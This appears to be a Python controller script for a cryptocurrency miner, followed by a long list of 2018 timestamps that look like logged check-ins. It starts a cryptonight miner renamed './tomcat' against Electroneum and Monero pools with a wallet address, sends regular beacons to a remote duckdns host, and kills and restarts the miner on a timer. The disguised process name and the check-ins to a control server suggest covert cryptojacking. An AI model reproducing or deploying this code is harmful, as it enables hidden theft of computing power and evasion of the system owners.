import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:04.013519
#2018-02-17 16:37:05.208349
#2018-02-17 18:25:04.327410
#2018-02-17 20:13:07.717620
#2018-02-17 22:02:07.004242
#2018-02-17 23:45:06.900142
#2018-02-18 01:36:03.451269
#2018-02-18 03:23:04.914497
#2018-02-18 05:11:06.107151
#2018-02-18 07:05:05.217072
#2018-02-18 08:53:01.238364
#2018-02-18 10:40:04.068271
#2018-02-18 12:25:07.029721
#2018-02-18 14:13:07.292239
#2018-02-18 16:03:04.039715
#2018-02-18 17:51:04.649040
#2018-02-18 19:38:01.291260
#2018-02-18 21:23:01.784849
#2018-02-18 23:12:06.256817
#2018-02-19 00:58:04.689735
#2018-02-19 02:46:05.207914
#2018-02-19 04:32:07.410333
#2018-02-19 06:17:07.143334
#2018-02-19 08:06:05.510849
#2018-02-19 09:56:08.000175
#2018-02-19 11:47:08.298585
#2018-02-19 13:34:01.531974
#2018-02-19 15:22:08.459223
#2018-02-19 17:11:06.543593
#2018-02-19 18:58:02.219156
#2018-02-19 20:43:07.005924
#2018-02-19 22:32:08.298784
#2018-02-20 00:18:05.666373
#2018-02-20 02:06:05.914121
#2018-02-20 03:55:04.227721
#2018-02-20 05:40:05.901735
#2018-02-20 07:27:01.795307
#2018-02-20 09:11:05.241542
#2018-02-20 10:54:01.352552
#2018-02-20 12:41:07.864182
#2018-02-20 14:26:07.773518
#2018-02-20 16:10:08.608541
#2018-02-20 17:55:07.148169
#2018-02-20 19:46:01.918536
#2018-02-20 21:38:04.294446
#2018-02-20 23:19:05.607811
#2018-02-21 01:03:03.920248
#2018-02-21 02:51:01.601146
#2018-02-21 04:38:03.822591
#2018-02-21 06:25:07.805676
#2018-02-21 08:11:07.504232
#2018-02-21 09:59:06.836523
#2018-02-21 11:48:05.647065
#2018-02-21 13:40:10.107726
#2018-02-21 15:25:12.088457
#2018-02-21 17:15:08.644351
#2018-02-21 19:04:07.205676
#2018-02-21 20:52:04.866188
#2018-02-21 22:37:07.881875
#2018-02-22 00:27:06.536816
#2018-02-22 02:16:05.740101
#2018-02-22 04:02:06.834467
#2018-02-22 05:48:01.480846
#2018-02-22 07:33:07.180145
#2018-02-22 09:22:04.974528
#2018-02-22 11:08:06.370800
#2018-02-22 12:54:07.986610
#2018-02-22 14:42:08.387598
#2018-02-22 16:28:07.720352
#2018-02-22 18:14:04.686482
#2018-02-22 20:06:01.982633
#2018-02-22 21:54:01.260326
#2018-02-22 23:40:08.590376
#2018-02-23 01:29:07.744561
#2018-02-23 03:17:02.055796
#2018-02-23 05:03:05.756152
#2018-02-23 06:46:07.138973
#2018-02-23 08:34:03.688187
#2018-02-23 10:47:10.687084
#2018-02-23 12:46:03.648852
#2018-02-23 14:29:08.012049
#2018-02-23 16:20:07.676493
#2018-02-23 18:08:08.768927
#2018-02-23 19:53:08.253230
#2018-02-23 21:37:05.083130
#2018-02-23 23:26:07.560765
#2018-02-24 01:19:07.748613
#2018-02-24 03:11:04.391708
#2018-02-24 04:56:04.110096
#2018-02-24 06:43:04.853200
#2018-02-24 08:32:03.684280
#2018-02-24 10:19:06.049168
#2018-02-24 12:14:06.593241
#2018-02-24 14:07:06.067624
#2018-02-24 15:53:06.456402
#2018-02-24 17:46:07.516941
#2018-02-24 19:33:04.125027
#2018-02-24 21:21:01.692850
#2018-02-25 00:01:04.755917
#2018-02-25 03:16:07.681616
#2018-02-25 06:49:06.354695